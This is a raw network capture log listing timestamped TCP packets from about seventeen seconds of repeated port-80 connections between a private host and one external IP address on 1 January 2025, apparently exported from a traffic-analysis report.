                                                                                                                                Jan 1, 2025 21:48:16.453356981 CET4994980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:16.458086014 CET8049949172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:16.811736107 CET4994980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:16.816504002 CET8049949172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:16.924693108 CET8049949172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:16.983455896 CET4994980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.250823021 CET8049949172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:17.296370029 CET4994980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.372874975 CET4994980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.373666048 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.378098965 CET8049949172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:17.378372908 CET4994980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.378489971 CET8049955172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:17.379169941 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.379276991 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.384022951 CET8049955172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:17.739327908 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:17.744180918 CET8049955172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:17.822901011 CET8049955172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:17.874100924 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.115868092 CET8049955172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:18.171068907 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.540978909 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.541599989 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.546062946 CET8049955172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:18.546108961 CET4995580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.546365976 CET8049964172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:18.546451092 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.550086021 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.554838896 CET8049964172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:18.905550957 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:18.910391092 CET8049964172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:18.993268013 CET8049964172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.048110008 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.248621941 CET8049964172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.295958996 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.366298914 CET4994380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.371850967 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.372556925 CET4997080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.376806021 CET8049964172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.376866102 CET4996480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.377358913 CET8049970172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.377449989 CET4997080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.377564907 CET4997080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.382304907 CET8049970172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.594151020 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.594238997 CET4997080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.598956108 CET8049973172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.599010944 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.599226952 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.603984118 CET8049973172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.641244888 CET8049970172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.714291096 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.719105005 CET8049974172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.719191074 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.719274044 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.724003077 CET8049974172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.732336044 CET8049970172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.732469082 CET4997080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.952332020 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:19.957101107 CET8049973172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:19.957199097 CET8049973172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.071722031 CET8049973172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.077482939 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.082350016 CET8049974172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.124090910 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.171821117 CET8049974172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.217952967 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.264096975 CET8049973172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.311594963 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.343327045 CET8049974172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.389704943 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.468274117 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.468523979 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.469129086 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.473329067 CET8049973172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.473380089 CET4997380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.473510027 CET8049974172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.473575115 CET4997480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.473864079 CET8049980172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.473934889 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.474062920 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.478806019 CET8049980172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.861793995 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:20.866612911 CET8049980172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.939517021 CET8049980172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:20.999094963 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.203891993 CET8049980172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:21.249114037 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.324965954 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.325906038 CET4998680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.329996109 CET8049980172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:21.330054045 CET4998080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.330715895 CET8049986172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:21.330791950 CET4998680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.330883026 CET4998680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.335592031 CET8049986172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:21.686697960 CET4998680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:21.691612959 CET8049986172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:21.775507927 CET8049986172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:21.827320099 CET4998680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.041657925 CET8049986172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.092854023 CET4998680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.166520119 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.171396017 CET8049992172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.171534061 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.171600103 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.176333904 CET8049992172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.530476093 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.535293102 CET8049992172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.615510941 CET8049992172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.655359030 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.795046091 CET8049992172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.842854977 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.916009903 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.916515112 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.921006918 CET8049992172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.921427965 CET8049998172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:22.921484947 CET4999280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.921505928 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.921646118 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:22.926378965 CET8049998172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:23.280643940 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.285414934 CET8049998172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:23.387042046 CET8049998172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:23.436671019 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.647599936 CET8049998172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:23.702234983 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.904021025 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.904449940 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.909765959 CET8049998172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:23.909826040 CET4999880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.909887075 CET8050004172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:23.909955025 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.910115004 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:23.915673018 CET8050004172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:24.264970064 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.269970894 CET8050004172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:24.364288092 CET8050004172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:24.405371904 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.654026031 CET8050004172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:24.702239990 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.774162054 CET4998680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.778676033 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.778927088 CET5001580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.783592939 CET8050004172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:24.783699036 CET8050015172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:24.783760071 CET5000480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.783771038 CET5001580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.783849001 CET5001580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:24.788630962 CET8050015172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.139825106 CET5001580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.144809008 CET8050015172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.255770922 CET8050015172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.265875101 CET5001580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.268416882 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.270937920 CET8050015172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.271003008 CET5001580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.273261070 CET8050016172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.273353100 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.273418903 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.278134108 CET8050016172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.387614012 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.392467022 CET8050017172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.392546892 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.392644882 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.397382975 CET8050017172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.624209881 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.629046917 CET8050016172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.629153013 CET8050016172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.717118025 CET8050016172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.749278069 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.754077911 CET8050017172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.764817953 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:25.838979959 CET8050017172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:25.889833927 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.097963095 CET8050017172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:26.137073994 CET8050016172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:26.155370951 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.186630011 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.771894932 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.772128105 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.772865057 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.777255058 CET8050016172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:26.777302027 CET5001680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.777718067 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:26.777776003 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.777942896 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.778284073 CET8050017172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:26.778323889 CET5001780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:26.782752991 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.142849922 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.147737026 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.226285934 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.280358076 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.406779051 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.452236891 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.493978024 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.546006918 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.619762897 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.620548964 CET5003480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.725733995 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.725780010 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.726166964 CET8050034172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.726234913 CET5003480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.726341963 CET5003480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.726650953 CET8050028172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:27.726694107 CET5002880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:27.732321024 CET8050034172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:28.077461004 CET5003480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:28.082302094 CET8050034172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:28.178814888 CET8050034172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:28.233488083 CET5003480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:28.385804892 CET8050034172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:28.436613083 CET5003480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:28.516798973 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:28.522793055 CET8050040172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:28.522964001 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:28.523046017 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:28.529055119 CET8050040172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:28.876835108 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:28.882941008 CET8050040172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:28.978311062 CET8050040172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:29.030358076 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.232832909 CET8050040172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:29.280369043 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.492499113 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.493092060 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.497504950 CET8050040172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:29.497576952 CET5004080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.497999907 CET8050050172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:29.498059988 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.498138905 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.502952099 CET8050050172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:29.842928886 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:29.847774029 CET8050050172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:29.969917059 CET8050050172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:30.014760971 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.377978086 CET8050050172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:30.421005964 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.494458914 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.495016098 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.499514103 CET8050050172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:30.499583960 CET5005080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.499893904 CET8050056172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:30.499963999 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.500037909 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.504786968 CET8050056172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:30.858680964 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:30.865014076 CET8050056172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:30.972232103 CET8050056172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.014852047 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.147048950 CET8050056172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.156759977 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.161576033 CET8050061172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.161839962 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.161917925 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.166703939 CET8050061172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.202239037 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.257461071 CET5003480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.260695934 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.265571117 CET8050062172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.265923977 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.266024113 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.270776987 CET8050062172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.514938116 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.520457983 CET8050061172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.521024942 CET8050061172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.608020067 CET8050061172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.624171972 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.629024029 CET8050062172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.655370951 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.710890055 CET8050062172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.764765978 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:31.901730061 CET8050061172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:31.952243090 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.005961895 CET8050062172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.065051079 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.169096947 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.172055960 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.172466993 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.173299074 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.174082994 CET8050061172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.174148083 CET5006180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.177017927 CET8050062172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.177067995 CET5006280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.177428007 CET8050056172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.177470922 CET5005680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.178572893 CET8050070172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.178647041 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.178736925 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.185061932 CET8050070172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.530608892 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.536438942 CET8050070172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.642127037 CET8050070172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.686630964 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:32.906758070 CET8050070172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:32.952241898 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.034025908 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.034328938 CET5007680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.039155006 CET8050070172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:33.039186001 CET8050076172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:33.039247036 CET5007080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.039292097 CET5007680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.039402008 CET5007680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.044169903 CET8050076172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:33.389849901 CET5007680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.394706011 CET8050076172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:33.508472919 CET8050076172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:33.561728001 CET5007680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:33.786330938 CET8050076172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:33.827265024 CET5007680192.168.2.4172.67.220.198
